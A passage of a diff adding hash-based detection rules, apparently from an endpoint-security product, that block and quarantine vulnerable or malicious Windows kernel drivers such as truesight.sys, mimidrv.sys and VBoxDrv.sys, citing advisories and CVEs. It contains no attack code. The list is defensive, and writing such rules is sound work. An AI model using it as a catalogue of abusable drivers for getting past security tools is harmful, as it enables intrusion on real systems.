+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f06a3ce5-ea36-5f1e-bc81-4b17a44441cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480268Z",
+ "creation_date": "2026-03-23T11:45:30.480271Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33494ed37d4be23b7de493d5f2c9c31a83a7a834c79a5fd7c2a93c1054f583b1",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f07a2183-25e1-576d-aac8-6da429b664d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828225Z",
+ "creation_date": "2026-03-23T11:45:31.828229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828237Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a330bbf3d7e7df05ccc862ce00558226515259db9beefc461ca52b20bc550ac1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0842e48-acc8-5301-a18d-6b1d8a87a020",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620798Z",
+ "creation_date": "2026-03-23T11:45:29.620800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9b3878ddc5dfb237d38f8d25067267870afd67d12a330397a8853209c4d889c",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f093affe-0ee2-551c-817c-7f4a71f115c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454124Z",
+ "creation_date": "2026-03-23T11:45:30.454128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7c79238f862b471740aff4cc3982658d1339795e9ec884a8921efe2e547d7c3",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0994127-6151-5352-9f80-6b55f6c9248d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807370Z",
+ "creation_date": "2026-03-23T11:45:31.807372Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807378Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "504aa932b4c664e62f7958a8284040a3e4e89a8faf53b28ea6cd86d4ea3bc637",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f09c11f2-c992-5566-8d4a-2ed64efdbc3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819912Z",
+ "creation_date": "2026-03-23T11:45:30.819914Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35ad05063e2b44b2e606464f12405b954ac8bc8417fa9732ba13365dbe26f90b",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0a88f52-7fba-5427-9a57-9f90bdc090eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826685Z",
+ "creation_date": "2026-03-23T11:45:31.826687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d091fd19eadd1cbb97b279d50c022ecd1bf2178a24552086ecf43e1c26e3b8dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0b4bc5b-8184-532a-b959-58983c714a70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832927Z",
+ "creation_date": "2026-03-23T11:45:30.832930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fbb1b9ec0952ce9e643da077c2b8a0ad892f94b749c5e1f6d521934c7b85fe37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0be8ae1-bc11-56e5-8f81-65a4f7925e2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818134Z",
+ "creation_date": "2026-03-23T11:45:31.818137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cdf3023c31e1d6e135a213d0b6b5ec1042a76f9c3a0aaac5bf3ca44ae7e93dfe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0c4e43a-0147-5621-91fc-85ee3f7fcfe5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480099Z",
+ "creation_date": "2026-03-23T11:45:30.480101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59cbdc9190000b1de3719dbdb5d90459c602487672a3bae9c56d8ffae5e64250",
+ "comment": "Vulnerable Kernel Driver (aka stdcdrv64sys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0d51228-26d4-5581-af10-29572aabef61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497596Z",
+ "creation_date": "2026-03-23T11:45:31.497599Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7310f23cc50de883174cdd6d2bb3ebeb5f82e9cfe8a600e430260574537a585",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0d72f79-9ee9-5b63-8d78-30953b161ea7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465709Z",
+ "creation_date": "2026-03-23T11:45:30.465712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07759750fbb93c77b5c3957c642a9498fcff3946a5c69317db8d6be24098a4a0",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0e66f8b-d6b0-5d17-a2fd-4d2d5e1c0643",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466865Z",
+ "creation_date": "2026-03-23T11:45:30.466881Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466891Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e1d32e156037b09105c3640d06e5b34fbe0bb49c605697d13b5fc26776fae26",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f10681fb-11c8-53d5-892d-3910a058261e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980603Z",
+ "creation_date": "2026-03-23T11:45:29.980605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39789a159c1196255f1b6d83e23af4082fd4cffe2662e40b71631b4e2e4bc05d",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f10b8f44-5a16-5d0a-873e-040078513b9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456982Z",
+ "creation_date": "2026-03-23T11:45:30.456985Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce12d9c2996a6626f6fc68415f8a94851b3468c9c62cc408dbdc0227cf77939d",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f10c51b7-b98a-5900-9a99-77ecc1bb544b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494905Z",
+ "creation_date": "2026-03-23T11:45:31.494907Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494912Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9cd1e2a2f242719ea4f69364abc3d0732a119eea406e01c1cd53b3fb4222e66f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1111198-594d-5e46-a6f3-548f2ed5e68d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815141Z",
+ "creation_date": "2026-03-23T11:45:31.815144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815149Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa1c8e1f60b19fe70de7fa80763a193bc85aa4bb1803895a8a849992429633a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1111e04-83be-532b-9b22-8ed433340468",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826786Z",
+ "creation_date": "2026-03-23T11:45:30.826790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91ea0f447ba2d2ceee00054c3df287499cb62c73ff272907a7295199ec6a8964",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f11a38ca-434e-531b-9e7a-3001eb011fa1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615468Z",
+ "creation_date": "2026-03-23T11:45:29.615470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6bed7f1304c6785a06064b04e0e3cb55384588f18ea2fc348a6fcd5784f47558",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f12e2a70-d771-5ff9-9fda-47f9f2b54240",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156826Z",
+ "creation_date": "2026-03-23T11:45:31.156828Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bef75f86c7f13b273f45d3bfd16f5875e1a77b5c6932c48eb1aa3729d06913b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f13fad44-f5c3-5f61-a012-bd27aeab9bb7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495208Z",
+ "creation_date": "2026-03-23T11:45:31.495212Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495221Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "407b5dbd822eea9b5b3edd0cb655f32a46456556fe093782ea97008a489e1f10",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f15b1e12-8ff9-51bd-ac87-1d0072064ad0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608509Z",
+ "creation_date": "2026-03-23T11:45:29.608511Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608517Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c26b51b4c37330800cff8519252e110116c3aaade94ceb9894ec5bfb1b8f9924",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f16e2754-36a2-56b0-8917-0ca513a9787b",
